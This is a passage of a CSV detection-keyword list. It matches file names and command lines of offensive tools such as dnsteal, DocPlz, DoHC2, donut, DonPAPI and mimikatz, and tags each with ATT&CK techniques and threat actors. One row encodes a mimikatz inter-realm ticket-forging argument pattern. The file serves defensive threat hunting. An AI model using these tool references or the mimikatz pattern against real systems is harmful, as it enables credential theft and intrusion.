LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. 
full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","#linux","N/A","N/A","3","208","47","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z","6696" "*/dns-srv-enum.nse*",".{0,1000}\/dns\-srv\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6697" "*/DNSStager.git*",".{0,1000}\/DNSStager\.git.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","1","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","6698" "*/dnsstager.py*",".{0,1000}\/dnsstager\.py.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","1","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","6699" "*/dnsteal*",".{0,1000}\/dnsteal.{0,1000}","offensive_tool_keyword","dnsteal","This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.","T1048.003 - T1568.002 - T1573.002","TA0010 - 
TA0002","N/A","N/A","Data Exfiltration","https://github.com/m57/dnsteal","1","1","N/A","N/A","N/A","10","1694","231","2022-02-03T11:04:49Z","2015-08-11T17:02:58Z","6700" "*/dnstool.py*",".{0,1000}\/dnstool\.py.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","6701" "*/dns-update.nse*",".{0,1000}\/dns\-update\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6702" "*/dns-zeustracker.nse*",".{0,1000}\/dns\-zeustracker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6703" "*/dns-zone-transfer.nse*",".{0,1000}\/dns\-zone\-transfer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6704" "*/dns-zone-transfer.py*",".{0,1000}\/dns\-zone\-transfer\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","6705" "*/dobin/avred*",".{0,1000}\/dobin\/avred.{0,1000}","offensive_tool_keyword","avred","Avred is used to identify which parts of a file are identified by an Antivirus and tries to show as much information and context as possible about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","N/A","9","5","465","55","2025-02-26T08:12:03Z","2022-05-19T12:12:34Z","6706" "*/DockerPwn.py*",".{0,1000}\/DockerPwn\.py.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","1","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","6708" "*/docker-version.nse*",".{0,1000}\/docker\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts.
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6709" "*/DocPlz.git*",".{0,1000}\/DocPlz\.git.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","6710" "*/DocsPLZ.cpp*",".{0,1000}\/DocsPLZ\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","6711" "*/DocsPLZ.exe*",".{0,1000}\/DocsPLZ\.exe.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","6712" "*/documentation-c2/*",".{0,1000}\/documentation\-c2\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","6713" "*/documentation-payload/*",".{0,1000}\/documentation\-payload\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","6714" "*/Do-Exfiltration.ps1*",".{0,1000}\/Do\-Exfiltration\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","6715" "*/Doge-Loader/*",".{0,1000}\/Doge\-Loader\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 
- T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","N/A","10","10","280","57","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z","6716" "*/DoHC2.cs*",".{0,1000}\/DoHC2\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","6717" "*/DoHC2.git*",".{0,1000}\/DoHC2\.git.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","6718" "*/DoHC2/*",".{0,1000}\/DoHC2\/.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","6719" "*/domain:* /sid:* /sids:* /rc4:* /user:* /service:krbtgt /target:*.kirbi*",".{0,1000}\/domain\:.{0,1000}\s\/sid\:.{0,1000}\s\/sids\:.{0,1000}\s\/rc4\:.{0,1000}\s\/user\:.{0,1000}\s\/service\:krbtgt\s\/target\:.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz Using domain trust key From the DC dump the hash of the currentdomain\targetdomain$ trust account using Mimikatz (e.g. with LSADump or DCSync). Then using this trust key and the domain SIDs. 
forge an inter-realm TGT using Mimikatz adding the SID for the target domains enterprise admins group to our SID history.","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","6720" "*/domain_analyzer.git*",".{0,1000}\/domain_analyzer\.git.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Reconnaissance","https://github.com/eldraco/domain_analyzer","1","1","N/A","N/A","6","10","1858","241","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z","6721" "*/domain_analyzer:latest*",".{0,1000}\/domain_analyzer\:latest.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - 
TA0009","N/A","N/A","Reconnaissance","https://github.com/eldraco/domain_analyzer","1","0","N/A","N/A","6","10","1858","241","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z","6722" "*/domainhunter*",".{0,1000}\/domainhunter.{0,1000}","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","1","N/A","N/A","N/A","10","1587","292","2024-06-06T21:01:21Z","2017-03-01T11:16:26Z","6723" "*/DomainPasswordSpray.git*",".{0,1000}\/DomainPasswordSpray\.git.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","6724" "*/DomainRecon/*.txt*",".{0,1000}\/DomainRecon\/.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","6725" "*/DomainTrustRecon.ahk*",".{0,1000}\/DomainTrustRecon\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation 
tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","6726" "*/domcachedump.py*",".{0,1000}\/domcachedump\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","1","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","6727" "*/domcachedump.py*",".{0,1000}\/domcachedump\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","6728" "*/domcon-brute.nse*",".{0,1000}\/domcon\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6729" "*/domcon-cmd.nse*",".{0,1000}\/domcon\-cmd\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6730" "*/Dome.git*",".{0,1000}\/Dome\.git.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Reconnaissance","https://github.com/v4d1/Dome","1","1","N/A","N/A","5","6","531","74","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z","6731" "*/domino-enum-users.nse*",".{0,1000}\/domino\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6732" "*/dompdf-rce*",".{0,1000}\/dompdf\-rce.{0,1000}","offensive_tool_keyword","POC","This repository contains a vulnerable demo application using dompdf 1.2.0 and an exploit that achieves remote code execution via a ttf+php polyglot file.","T1203 - T1204","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/positive-security/dompdf-rce","1","1","N/A","N/A","N/A","2","176","66","2022-03-17T18:05:07Z","2022-03-14T19:51:06Z","6733" "*/DonPAPI.git*",".{0,1000}\/DonPAPI\.git.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","6734" "*/DonPAPI.py*",".{0,1000}\/DonPAPI\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","6735" "*/DonPAPI.zip*",".{0,1000}\/DonPAPI\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","6736" "*/donut 
*.exe*",".{0,1000}\/donut\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","#linux","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","6737" "*/donut.exe*",".{0,1000}\/donut\.exe.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","6738" "*/donut.git",".{0,1000}\/donut\.git","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","6739" "*/Donut_Linux*",".{0,1000}\/Donut_Linux.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","#linux","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","6740" "*/Donut_Windows*",".{0,1000}\/Donut_Windows.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","6741" "*/DonutCS/Donut.cs*",".{0,1000}\/DonutCS\/Donut\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","6742" "*/donutmodule.c*",".{0,1000}\/donutmodule\.c.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","6743" "*/donut-packer.py*",".{0,1000}\/donut\-packer\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","6744" "*/DonutTest/*",".{0,1000}\/DonutTest\/.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","6745" "*/DotNet/SigFlip*",".{0,1000}\/DotNet\/SigFlip.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT 